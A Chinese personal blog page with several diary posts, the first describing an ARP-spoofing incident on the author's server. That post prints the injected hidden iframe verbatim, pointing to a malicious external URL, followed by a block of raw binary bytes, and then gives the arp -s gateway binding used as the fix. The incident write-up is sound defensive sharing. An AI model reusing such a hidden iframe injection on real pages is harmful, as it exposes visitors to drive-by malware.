惊心动魄修复ARP攻击

2 Comments

美好的夜晚,就在某人发来“晚安~”之后被ARP攻击毁掉了…
20:07:32,blue问我是不是对服务器进行操作了,页面显示不正常。
检查发现这样的状况:

<iframe src=http://f.ugt4d.cn/d1/13/index.htm width=100 height=0></iframe>‹������´VOo#5?©ßÁ5Rè2N²Ý²M2Alº‚E Tlpª<cÏŒµ{°=¤ˆÏÃXqZq¡’+Hœ¸pCâÎ… Ï3ùÛ¦¥ZÁ2cûýý½÷~ÎhÿäãÉô‹ÓÇ(s¹D§Ÿ>zúd‚p‡ÏîO9™ž Ïߟ~øõ‚.šª¬pB+*    yüF8s®RUUPÝ´IÉô2ó¶z^yñÙqšs ÷Z£Úã,—ʆ;ìôŽõF˜SæßN8ÉÇ’ÂÆåÅ>z—åB    æ6oY4ÑÊ
yPÅåˆ4 •sG‘÷Ñá_–â<Ä^+יΠŽQܬBìøÌïsˆâŒË]˜FÏë�¤PÏQfx œ¦ÜêÝÇ‘:*ˆ­ÅÈpbëæ’ÛŒs‡‘ õ�ñÆÈ2Q8$©JK0âè9}Voz¯”9°\&AA
Ä$†æÜ’«Ôeh?DÝ{諽Ö›2RÇÔ2—ùæÎp¯õõ^+)UìW)†Çî 4²1S    Åtµ’ /$y-Ð(H°=2Ëõ__#IŽ*Á\â£n£HÆMˆá3æR”1¡Ò?lÖ¶ q½öç’ZhˆÒÚP¾3[>nðxäØÒÏÃ.,‰c›{½îÆæõÓþ•µâÌÂs]NèQ.ÒÌ
»Å¬ö<n«ÈÃZÚ ²UˆBñˆ@Zj©k©ÍàÍž££a
×±â‚z‡Å¬YVyÀJ²!ÿüí«?üñë%@fÆ7zù— ®on¬S¼šÎ;}üŸîòŸh“#ÑL³ÚÂÔ(hôE­1¢uÆx1nA‘ï4£ιmÒB¥[ŒZ&ãjiÂ
†Ñ9•%|«~ÿ={~«xcv¥æo“†Á8ƒà+jÖN|kìÄ“J‘BÆW¹|ùÍå߃,“gë>¥ žô!ÿ´ÎwléÒµi^ =jµY˜ò„ó.kƒ70f0Æ|æµ€}¨IÄðYDöêǍßXŽ;ù‚çû?×áoT@ù+í1i`ªëv¶Þõâþ¼;Œ»Guc«_;\&!Öı¯-£\¸õD¥sZ­
úÓïè»—ž·GÄC>¾³7X×ß    Û©    œÚƒ{ÏÞ)•×€ãžØÆ?Ü›žºÖ×�>

P.S. 我之所以没有隐藏掉iframe里的src,完全是SEO需要,下一个中招的弟兄可以搜到这篇文章。我知道你年少轻狂,也别动去访问那一页的念头!

总之就是所有页面前面都被加了一个iframe,明显的ARP攻击症状。
搜索从来不删除邮件的Gmail,我发现上次ARP攻击之后,我们的真正网关的MAC被换过了…所以这也是我不想轻易执行arp -s绑定的原因:机房会换网关的,而一旦换了我们不知道,就回导致断网。
于是我只好不断执行arp命令查看当前的MAC,发现是错误的MAC,就执行以下命令清除ARP缓存:

arp -s 网关IP地址 网关真正的MAC地址

然而我悲壮地发现ARP缓存更新非常快,不到两分钟呢。我总不能一夜都手工干这个啊。于是我还是动了-s的念头。最终-s暂时躲过了这一劫,下面到了21点30分,例行宕机时间了…

浅尝辄止

4 Comments

过气的帅茄子,公认的纯情大叔Rufus居然有着Count=13的List。
像我这样的人,是不是太过浅尝辄止了点~
也许中国人都如我一般懒惰,还是根本没有这样的环境。
想想而已,该做的还在继续做,而且没有任何想改变的意思~

“我们是糖,甜到悲伤。”

我在想,有几个人看得懂呢?一定有人说,真是个自恋的博主,其实我们大家都看得懂…

雷雨

1 Comment

下雨啦,不奇怪。
睡着觉,竟然被雷吵醒,多少年来似是第一次呢。

200804230158087836

打雷的时候,总是会想起儿时,那些仲夏。不喜欢下雨,因为下雨就不能出去玩了。蹲在姥爷家的阳台上,望着外面噗噗的雨,以及那些闪电,忘不了那些泥土混杂雨水的芬芳。这么些年过去了,终于再也寻不到。

效率

5 Comments

今天再次体验到上海的办事效率。
上海无疑是我经历过的最有效率的城市,每个人都热爱自己的工作,并在自己的工作岗位上默默却出色地做着。在上海,最普通的工作人员,也许做着最平凡的事情,但也都是非常专业非常敬业的。如果你仔细观察一个人在工作,哪怕就是地铁里的清洁工,也会发现在专业素质背后的,属于他自己的一点小癖好,让人觉得不是那么生硬,而是一个活生生的人,以及他背后的家庭。
今天办护照,首先是同济大学本部的派出所,户籍证明迅速搞定,而且以前还收费的,现在也免掉了。我们办完之后并没急着离开,在等光光办好一起走,那时候他还没到。
我们去的上海市出入境管理局本部,上海科技馆那边那个办理的。还没出地铁站就开始看到大大的指示牌。
走过去,其实有点远。
领号,拍照,领表,填表,复印,快递,等号,办理,交回快递。
整个过程不超过40分钟,效率啊。

P.S. 我要去的是马尔代夫~

Microsoft STBC HPC面试

2 Comments

hpc_headers_04_sl

寒假的时候让杨光帮我投了下简历,然后过了一阵子就组织面试了。说起来比较神奇,之前我在joinms里自己投过简历,没多久就收到STBC的HR写来的written test通知,我延了一次,第二次约好的时间因为和杨光介绍过去的STBC HPC的电话面试时间冲突,被我拒掉了…神奇的是,当STBC HPC电话面试结束后,收到的却是之前写来written test通知的同一个HR发来的on site面试通知…岂不是给人一种错觉:Microsoft的written test通知直接无视即可获得面试机会,呵呵。
Anyway,STBC是一个很远的地方,我九点半出门,约好下午一点面试,我觉得肯定够用了,说不定还能找个KFC吃顿像样的饭,没想到当我最终赶到,是12点50分…
饿着肚子面试一下午,三个FTE(最后一个是STBC HPC组的一个PM),每人一小时,当我回到学校的时候已经是晚上7点,一天被占用掉了~
面试过程…没什么好说的,实验室这边不见得会放我走,所以我去的时候是抱着面着玩的心态去的,无欲无求我就很放松,所以一点也不紧张。第二个小伙是个复旦的帅哥,被他一阵鄙视算法,无奈了,还是继续加油吧…
不过收获总是有的,至少我知道了别人是怎么看待我的简历的,他们注意些什么,不注意些什么,看来简历要大改了~

如何解决Mac OS X下iTunes歌曲信息显示乱码

2 Comments

继续汉字信息化的问题。
我有些习惯,一尘不染的习惯,包括我的iPod中全部MP3歌曲,都包含了完整的tag元数据,歌手、专辑,甚至插图,一样不少。
转到Mac OS X来,拷贝过来的MP3在iTunes里,tag全部变成了乱码,很是郁闷。
这其实是MP3中tag数据的编码问题,Mac OS X里的编码解释没解释对,所以变成了乱码。解决方法,只要把所有文件的tag用一种Windows和Mac OS X都认识的编码重新转换即可。这个软件叫做MP3Tag,免费的。
流程如下(在Windows下操作):

  1. 首先把整个音乐库以添加文件夹的形式导入进来。
  2. 在工具,选项,标签,Mpeg中的写入,选择“ID3v2.3 UTF-16”。
  3. 然后确定出来全选,点右键,选择“保存标签”。
  4. 重新拷贝到Mac OS X下,导入iTunes。

2009-03-12_2017

嘿嘿,大功告成~

后记.NND,我截图的时候谁在狂发QQ!

撤离实验室

4 Comments

实验室出了些问题,领导的意见我完全不能接受,我不能接受那些在我分析完全不可能实现的功能,更不能在接受之后去承担做不出来的后果。
“你要是在公司,遇到这种问题怎么办呢?也是不做?”领导问。
我真的仔细思考了一下这个问题,答案是,如果在公司也遇到这样的情况,我一样会辞职不干了。其实我是一个很能容忍的人,一般绝大多数情况下是与世无争的,包括和大家一起吃饭做事,都是别人说了算啦,我从来不参与,最多提选择,因为我觉得无所谓。
于是我就不干了,搬出实验室,从此流浪在不让我借书的图书馆~